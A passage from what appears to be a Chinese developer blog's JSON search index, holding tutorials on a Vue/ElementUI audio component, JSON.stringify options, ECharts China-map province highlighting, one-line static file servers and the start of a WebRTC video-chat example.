@click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ 
audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; // 将整数转换成 时:分:秒的格式 function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { data () { return { audio: { // 该字段是音频是否处于播放状态的属性 playing: false, // 音频当前播放时长 currentTime: 0, // 音频最大播放时长 maxTime: 0 } } }, methods: { // 控制音频的播放与暂停 startPlayOrPause () { return this.audio.playing ? this.pause() : this.play() }, // 播放音频 play () { this.$refs.audio.play() }, // 暂停音频 pause () { this.$refs.audio.pause() }, // 当音频播放 onPlay () { this.audio.playing = true }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.maxTime = parseInt(res.target.duration) } }, filters: { // 使用组件过滤器来动态改变按钮的显示 transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, // 将整数转化成时分秒 formatSecond(second = 0) { return realFormatSecond(second) } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 打开浏览器可以看到,当音频播放时,当前时间也在改变。 5.4. 
音频进度条控制 进度条主要有两个控制,改变进度的原理是:改变audio.currentTime属性值\n音频播放后,当前时间改变,进度条就要随之改变 拖动进度条,可以改变音频的当前时间 // 进度条ui \u0026lt;el-slider v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; // 拖动进度条,改变当前时间,index是进度条改变时的回调函数的参数0-100之间,需要换算成实际时间 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, // 当音频当前时间改变后,进度条也要改变 onTimeupdate(res) { console.log(\u0026#39;timeupdate\u0026#39;) console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 进度条格式化toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, 5.5. 音频音量控制 音频的音量控制和进度控制差不多,也是通过拖动滑动条,去修改audio.volume属性值,该属性代表音量的大小,取值范围是0 - 1,用滑动条的时候,也是需要换算一下值,此处不再啰嗦\n5.6. 音频播放速度控制 音频播放速度控制和进度控制差不多,也是点击按钮,去修改audio.playbackRate属性值,该属性代表播放速度的倍率,1为正常速度,此处不再啰嗦\n5.7. 音频静音控制 静音的控制是点击按钮,去修改audio.muted属性,该属性有两个值: true(静音),false(不静音)。 注意,静音的时候,音频的进度条还是会继续往前走的。\n5.8. 音频下载控制 音频下载是一个a链接,记得加上download属性,不然浏览器会在新标签打开音频,而不是下载音频\n\u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; 5.9. 
个性化配置 音频的个性化配置有很多,大家可以自己扩展,通过父组件传递响应的值,可以做到个性化设置。\ncontrolList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, 例如父组件这样\n\u0026lt;template\u0026gt; \u0026lt;div id=\u0026#34;app\u0026#34;\u0026gt; \u0026lt;div v-for=\u0026#34;item in audios\u0026#34; :key=\u0026#34;item.url\u0026#34;\u0026gt; \u0026lt;VueAudio :theUrl=\u0026#34;item.url\u0026#34; :theControlList=\u0026#34;item.controlList\u0026#34;/\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; import VueAudio from \u0026#39;./components/VueAudio\u0026#39; export default { name: \u0026#39;app\u0026#39;, components: { VueAudio }, data () { return { audios: [ { url: \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, controlList: \u0026#39;onlyOnePlaying\u0026#39; }, { url: \u0026#39;http://devtest.qiniudn.com/回レ!雪月花.mp3\u0026#39;, controlList: \u0026#39;noDownload noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/あっちゅ~ま青春!.mp3\u0026#39;, controlList: \u0026#39;noDownload noVolume noMuted onlyOnePlaying\u0026#39; },{ url: \u0026#39;http://devtest.qiniudn.com/Preparation.mp3\u0026#39;, controlList: \u0026#39;noDownload noSpeed onlyOnePlaying\u0026#39; } ] } } } \u0026lt;/script\u0026gt; \u0026lt;style\u0026gt; \u0026lt;/style\u0026gt; 5.10. 
一点点ES6语法 大多数时候,我们希望页面上播放一个音频时,其他音频可以暂停。 [...audios]可以把一个类数组转化成数组,这个是我常用的。\nonPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); // 如果设置了排他性,当前音频播放是,其他音频都要暂停 [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, 5.11. 完成后的文件 //filename: VueAudio.vue \u0026lt;template\u0026gt; \u0026lt;div class=\u0026#34;di main-wrap\u0026#34; v-loading=\u0026#34;audio.waiting\u0026#34;\u0026gt; \u0026lt;!-- 这里设置了ref属性后,在vue组件中,就可以用this.$refs.audio来访问该dom元素 --\u0026gt; \u0026lt;audio ref=\u0026#34;audio\u0026#34; class=\u0026#34;dn\u0026#34; :src=\u0026#34;url\u0026#34; :preload=\u0026#34;audio.preload\u0026#34; @play=\u0026#34;onPlay\u0026#34; @error=\u0026#34;onError\u0026#34; @waiting=\u0026#34;onWaiting\u0026#34; @pause=\u0026#34;onPause\u0026#34; @timeupdate=\u0026#34;onTimeupdate\u0026#34; @loadedmetadata=\u0026#34;onLoadedmetadata\u0026#34; \u0026gt;\u0026lt;/audio\u0026gt; \u0026lt;div\u0026gt; \u0026lt;el-button type=\u0026#34;text\u0026#34; @click=\u0026#34;startPlayOrPause\u0026#34;\u0026gt;{{audio.playing | transPlayPause}}\u0026lt;/el-button\u0026gt; \u0026lt;el-button v-show=\u0026#34;!controlList.noSpeed\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;changeSpeed\u0026#34;\u0026gt;{{audio.speed | transSpeed}}\u0026lt;/el-button\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.currentTime | formatSecond}}\u0026lt;/el-tag\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noProcess\u0026#34; v-model=\u0026#34;sliderTime\u0026#34; :format-tooltip=\u0026#34;formatProcessToolTip\u0026#34; @change=\u0026#34;changeCurrentTime\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;el-tag type=\u0026#34;info\u0026#34;\u0026gt;{{ audio.maxTime | formatSecond }}\u0026lt;/el-tag\u0026gt; \u0026lt;el-button 
v-show=\u0026#34;!controlList.noMuted\u0026#34; type=\u0026#34;text\u0026#34; @click=\u0026#34;startMutedOrNot\u0026#34;\u0026gt;{{audio.muted | transMutedOrNot}}\u0026lt;/el-button\u0026gt; \u0026lt;el-slider v-show=\u0026#34;!controlList.noVolume\u0026#34; v-model=\u0026#34;volume\u0026#34; :format-tooltip=\u0026#34;formatVolumeToolTip\u0026#34; @change=\u0026#34;changeVolume\u0026#34; class=\u0026#34;slider\u0026#34;\u0026gt;\u0026lt;/el-slider\u0026gt; \u0026lt;a :href=\u0026#34;url\u0026#34; v-show=\u0026#34;!controlList.noDownload\u0026#34; target=\u0026#34;_blank\u0026#34; class=\u0026#34;download\u0026#34; download\u0026gt;下载\u0026lt;/a\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;script\u0026gt; function realFormatSecond(second) { var secondType = typeof second if (secondType === \u0026#39;number\u0026#39; || secondType === \u0026#39;string\u0026#39;) { second = parseInt(second) var hours = Math.floor(second / 3600) second = second - hours * 3600 var mimute = Math.floor(second / 60) second = second - mimute * 60 return hours + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + mimute).slice(-2) + \u0026#39;:\u0026#39; + (\u0026#39;0\u0026#39; + second).slice(-2) } else { return \u0026#39;0:00:00\u0026#39; } } export default { props: { theUrl: { type: String, required: true, }, theSpeeds: { type: Array, default () { return [1, 1.5, 2] } }, theControlList: { type: String, default: \u0026#39;\u0026#39; } }, name: \u0026#39;VueAudio\u0026#39;, data() { return { url: this.theUrl || \u0026#39;http://devtest.qiniudn.com/secret base~.mp3\u0026#39;, audio: { currentTime: 0, maxTime: 0, playing: false, muted: false, speed: 1, waiting: true, preload: \u0026#39;auto\u0026#39; }, sliderTime: 0, volume: 100, speeds: this.theSpeeds, controlList: { // 不显示下载 noDownload: false, // 不显示静音 noMuted: false, // 不显示音量条 noVolume: false, // 不显示进度条 noProcess: false, // 只能播放一个 onlyOnePlaying: false, // 不要快进按钮 noSpeed: false } } }, methods: 
{ setControlList () { let controlList = this.theControlList.split(\u0026#39; \u0026#39;) controlList.forEach((item) =\u0026gt; { if(this.controlList[item] !== undefined){ this.controlList[item] = true } }) }, changeSpeed() { let index = this.speeds.indexOf(this.audio.speed) + 1 this.audio.speed = this.speeds[index % this.speeds.length] this.$refs.audio.playbackRate = this.audio.speed }, startMutedOrNot() { this.$refs.audio.muted = !this.$refs.audio.muted this.audio.muted = this.$refs.audio.muted }, // 音量条toolTip formatVolumeToolTip(index) { return \u0026#39;音量条: \u0026#39; + index }, // 进度条toolTip formatProcessToolTip(index = 0) { index = parseInt(this.audio.maxTime / 100 * index) return \u0026#39;进度条: \u0026#39; + realFormatSecond(index) }, // 音量改变 changeVolume(index = 0) { this.$refs.audio.volume = index / 100 this.volume = index }, // 播放跳转 changeCurrentTime(index) { this.$refs.audio.currentTime = parseInt(index / 100 * this.audio.maxTime) }, startPlayOrPause() { return this.audio.playing ? 
this.pausePlay() : this.startPlay() }, // 开始播放 startPlay() { this.$refs.audio.play() }, // 暂停 pausePlay() { this.$refs.audio.pause() }, // 当音频暂停 onPause () { this.audio.playing = false }, // 当发生错误, 就出现loading状态 onError () { this.audio.waiting = true }, // 当音频开始等待 onWaiting (res) { console.log(res) }, // 当音频开始播放 onPlay (res) { console.log(res) this.audio.playing = true this.audio.loading = false if(!this.controlList.onlyOnePlaying){ return } let target = res.target let audios = document.getElementsByTagName(\u0026#39;audio\u0026#39;); [...audios].forEach((item) =\u0026gt; { if(item !== target){ item.pause() } }) }, // 当timeupdate事件大概每秒一次,用来更新音频流的当前播放时间 onTimeupdate(res) { // console.log(\u0026#39;timeupdate\u0026#39;) // console.log(res) this.audio.currentTime = res.target.currentTime this.sliderTime = parseInt(this.audio.currentTime / this.audio.maxTime * 100) }, // 当加载语音流元数据完成后,会触发该事件的回调函数 // 语音元数据主要是语音的长度之类的数据 onLoadedmetadata(res) { console.log(\u0026#39;loadedmetadata\u0026#39;) console.log(res) this.audio.waiting = false this.audio.maxTime = parseInt(res.target.duration) } }, filters: { formatSecond(second = 0) { return realFormatSecond(second) }, transPlayPause(value) { return value ? \u0026#39;暂停\u0026#39; : \u0026#39;播放\u0026#39; }, transMutedOrNot(value) { return value ? \u0026#39;放音\u0026#39; : \u0026#39;静音\u0026#39; }, transSpeed(value) { return \u0026#39;快进: x\u0026#39; + value } }, created() { this.setControlList() } } \u0026lt;/script\u0026gt; \u0026lt;!-- Add \u0026#34;scoped\u0026#34; attribute to limit CSS to this component only --\u0026gt; \u0026lt;style scoped\u0026gt; .main-wrap{ padding: 10px 15px; } .slider { display: inline-block; width: 100px; position: relative; top: 14px; margin-left: 15px; } .di { display: inline-block; } .download { color: #409EFF; margin-left: 15px; } .dn{ display: none; } \u0026lt;/style\u0026gt; 6. 
感谢 如果你需要一个小型的vue音乐播放器,你可以试试vue-aplayer, 该播放器不仅仅支持vue组件,非Vue的也支持,你可以看看他们的demo\n","permalink":"https://wdd.js.org/posts/2018/02/vue-elementui-audio-component/","summary":"1. 简介 1.1. 相关技术 Vue Vue-cli ElementUI yarn (之前我用npm, 并使用cnpm的源,但是用了yarn之后,我发现它比cnpm的速度还快,功能更好,我就毫不犹豫选择yarn了) Audio相关API和事件 1.2. 从本教程你会学到什么? Vue单文件组件开发知识 Element UI基本用法 Audio原生API及Audio相关事件 音频播放器的基本原理 音频的播放暂停控制 更新音频显示时间 音频进度条控制与跳转 音频音量控制 音频播放速度控制 音频静音控制 音频下载控制 个性化配置与排他性播放 一点点ES6语法 2. 学前准备 基本上不需要什么准备,但是如果你能先看一下Aduio相关API和事件将会更好\nAudio: 如果你愿意一层一层剥开我的心 使用 HTML5 音频和视频 3. 在线demon 没有在线demo的教程都是耍流氓\n查看在线demon 项目地址 4. 开始编码 5. 项目初始化 ➜ test vue init webpack element-audio A newer version of vue-cli is available. latest: 2.9.2 installed: 2.9.1 ? Project name element-audio ? Project description A Vue.js project ?","title":"Vue+ElementUI 手把手教你做一个audio组件"},{"content":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 
1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return undefined; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能3: 通过数组过滤某些属性 只需要name属性和addr属性,其他不要。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, [\u0026#39;name\u0026#39;, \u0026#39;addr\u0026#39;]); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2.2. space space可以是数字或者是字符串, 如果是数字则表示属性名前加上空格符号的数量,如果是字符串,则直接在属性名前加上该字符串。\n功能1: 给输出属性前加上n个空格\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, 4); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能2: tab格式化输出\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, null, \u0026#39;\\t\u0026#39;); \u0026#34;{ \u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, \u0026#34;isDead\u0026#34;: false, \u0026#34;age\u0026#34;: 11, \u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 功能3: 搞笑\nJSON.stringify(user, null, \u0026#39;good\u0026#39;); \u0026#34;{ good\u0026#34;name\u0026#34;: \u0026#34;andy\u0026#34;, good\u0026#34;isDead\u0026#34;: false, good\u0026#34;age\u0026#34;: 11, 
good\u0026#34;addr\u0026#34;: \u0026#34;shanghai\u0026#34; }\u0026#34; 2.3. 深拷贝 var user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; var temp = JSON.stringify(user); var user2 = JSON.parse(temp); 3. 其他 JSON.parse() 其实也是支持第二个参数的。功能类似于JSON.stringify的第二个参数的功能。\n4. 参考 MDN JSON.stringify() ","permalink":"https://wdd.js.org/posts/2018/02/json-stringify-powerful/","summary":"1. 语法 JSON.stringify(value[, replacer[, space]]) 一般用法:\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:false,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 2. 扩展用法 2.1. replacer replacer可以是函数或者是数组。\n功能1: 改变属性值 将isDead属性的值翻译成0或1,0对应false,1对应true\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.stringify(user, function(key, value){ if(key === \u0026#39;isDead\u0026#39;){ return value === true ? 1 : 0; } return value; }); \u0026#34;{\u0026#34;name\u0026#34;:\u0026#34;andy\u0026#34;,\u0026#34;isDead\u0026#34;:0,\u0026#34;age\u0026#34;:11,\u0026#34;addr\u0026#34;:\u0026#34;shanghai\u0026#34;}\u0026#34; 功能2:删除某个属性 将isDead属性删除,如果replacer的返回值是undefined,那么该属性会被删除。\nvar user = {name: \u0026#39;andy\u0026#39;, isDead: false, age: 11, addr: \u0026#39;shanghai\u0026#39;}; JSON.","title":"你不知道的JSON.stringify()妙用"},{"content":"1. 
小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我换了一种方法。这个方法的核心思路是定时获取图表的配置,然后更新配置,最后再设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.5)\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; }, emphasis:{ areaColor: \u0026#39;#3be2fb\u0026#39;, color: \u0026#39;#000000\u0026#39;, shadowBlur: 200, shadowColor: \u0026#39;rgba(0, 0, 0, 0.5)\u0026#39; } } } ] }; // 使用刚指定的配置项和数据显示图表。 myChart.setOption(option); myChart.on(\u0026#39;click\u0026#39;, function(params) { console.log(params); }); setInterval(function(){ var op = myChart.getOption(); var data = op.series[0].data; var length = data.length; data.some(function(item, index){ if(item.selected){ item.selected = false; var next = (index + 1)%length; data[next].selected = true; return true; } }); myChart.setOption(op); }, 3000); 2.
后续补充 我从这里发现:https://github.com/ecomfe/echarts/issues/3282,选中地图的写法是这样的,我试了一下,果然可以。主要是type要是mapSelect,而不是geoSelect\nmyChart.dispatchAction({ type: \u0026#39;mapSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 // seriesIndex: 0, // 可选,系列名称,可以是一个数组指定多个系列 // seriesName: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 // dataIndex: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name: \u0026#39;河北\u0026#39; }); 3. 哪里去下载中国地图? 官方示例里是没有中国地图的,不过你可以去github的官方仓库里找。地址是:https://github.com/apache/incubator-echarts/tree/master/map\n4. 地图学习的栗子哪里有? 4.1. 先学习一下美国地图怎么玩吧 echarts官方文档上有美国地图的实例,地址:http://echarts.baidu.com/examples/editor.html?c=map-usa\n4.2. 我国地图也是有的,参考iphone销量这个栗子 地址:http://echarts.baidu.com/option.html#series-map, 注意:地图的相关文档在series-\u0026gt;type:map中\n","permalink":"https://wdd.js.org/posts/2018/02/echarts-highlight-china-map/","summary":"1. 小栗子 最早我是想通过dispatchAction方法去改变选中的省份,但是没有起作用,如果你知道这个方法怎么实现,麻烦你可以告诉我。 我实现的方法是另外一种。\ndispatchAction({ type: \u0026#39;geoSelect\u0026#39;, // 可选,系列 index,可以是一个数组指定多个系列 seriesIndex?: number|Array, // 可选,系列名称,可以是一个数组指定多个系列 seriesName?: string|Array, // 数据的 index,如果不指定也可以通过 name 属性根据名称指定数据 dataIndex?: number, // 可选,数据名称,在有 dataIndex 的时候忽略 name?: string }) 后来我换了一种方法。这个方法的核心思路是定时获取图表的配置,然后更新配置,最后再设置配置。\nvar myChart = echarts.init(document.getElementById(\u0026#39;china-map\u0026#39;)); var COLORS = [\u0026#34;#070093\u0026#34;, \u0026#34;#1c3fbf\u0026#34;, \u0026#34;#1482e5\u0026#34;, \u0026#34;#70b4eb\u0026#34;, \u0026#34;#b4e0f3\u0026#34;, \u0026#34;#ffffff\u0026#34;]; // 指定图表的配置项和数据 var option = { tooltip: { trigger: \u0026#39;item\u0026#39;, formatter: \u0026#39;{b}\u0026#39; }, series: [ { name: \u0026#39;中国\u0026#39;, type: \u0026#39;map\u0026#39;, mapType: \u0026#39;china\u0026#39;, selectedMode : \u0026#39;single\u0026#39;, label: { normal: { show: true }, emphasis: { show: true } }, data:[ // 默认高亮安徽省 {name:\u0026#39;安徽\u0026#39;, selected:true} ], itemStyle: { normal: { areaColor: \u0026#39;rgba(255,255,255,0.","title":"ECharts
轮流高亮中国地图各个省份"},{"content":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET /favicon.ico HTTP/1.1\u0026#34; 404 - 2. 基于nodejs 首先你要安装nodejs 2.1. http-server // 安装 npm install http-server -g // 用法 http-server [path] [options] 2.2. serve // 安装 npm install -g serve // 用法 serve [options] \u0026lt;path\u0026gt; 2.3. webpack-dev-server // 安装 npm install webpack-dev-server -g // 用法 webpack-dev-server 2.4. anywhere // 安装 npm install -g anywhere // 用法 anywhere anywhere -p port 2.5. puer // 安装 npm -g install puer // 使用 puer - 提供一个当前或指定路径的静态服务器 - 所有浏览器的实时刷新:编辑css实时更新(update)页面样式,其它文件则重载(reload)页面 - 提供简单熟悉的mock请求的配置功能,并且配置也是自动更新。 - 可用作代理服务器,调试开发既有服务器的页面,可与mock功能配合使用 - 集成了weinre,并提供二维码地址,方便移动端的调试 - 可以作为connect中间件使用(前提是后端为nodejs,否则请使用代理模式) ","permalink":"https://wdd.js.org/posts/2018/02/one-command-create-static-file-server/","summary":"简易服务器:在命令执行的所在路径启动一个http服务器,然后你可以通过浏览器访问该路径下的所有文件。\n在局域网内传文件,或者自己测试使用都是非常方便的。\n1. 基于python 1.1. 基于Python2 python -m SimpleHTTPServer port\n\u0026gt; python -m SimpleHTTPServer 8099 Serving HTTP on 0.0.0.0 port 8099 ... 127.0.0.1 - - [24/Oct/2017 11:07:56] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 1.2. 基于python3 python3 -m http.server port\n\u0026gt; python3 -m http.server 8099 Serving HTTP on 0.0.0.0 port 8099 (http://0.0.0.0:8099/) ... 
127.0.0.1 - - [24/Oct/2017 11:05:06] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - 127.0.0.1 - - [24/Oct/2017 11:05:06] code 404, message File not found 127.","title":"一行命令搭建简易静态文件http服务器"},{"content":" 本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.error(error); } drone.on(\u0026#39;open\u0026#39;, function(error){ if (error) { return console.error(error);} room = drone.subscribe(roomName); room.on(\u0026#39;open\u0026#39;, function(error){ if (error) {onError(error);} }); // 已经链接到房间后,就会收到一个 members 数组,代表房间里的成员 // 这时候信令服务已经就绪 room.on(\u0026#39;members\u0026#39;, function(members){ console.log(\u0026#39;MEMBERS\u0026#39;, members); // 如果你是第二个链接到房间的人,就会创建offer var isOfferer = members.length === 2; startWebRTC(isOfferer); }); }); // 通过Scaledrone发送信令消息 function sendMessage(message) { drone.publish({ room: roomName, message }); } function startWebRTC(isOfferer) { pc = new RTCPeerConnection(configuration); // 当本地ICE Agent需要通过信号服务器发送信息到其他端时 // 会触发icecandidate事件回调 pc.onicecandidate = function(event){ if (event.candidate) { sendMessage({ \u0026#39;candidate\u0026#39;: event.candidate }); } }; // 如果用户是第二个进入的人,就在negotiationneeded 事件后创建sdp if (isOfferer) { // onnegotiationneeded 
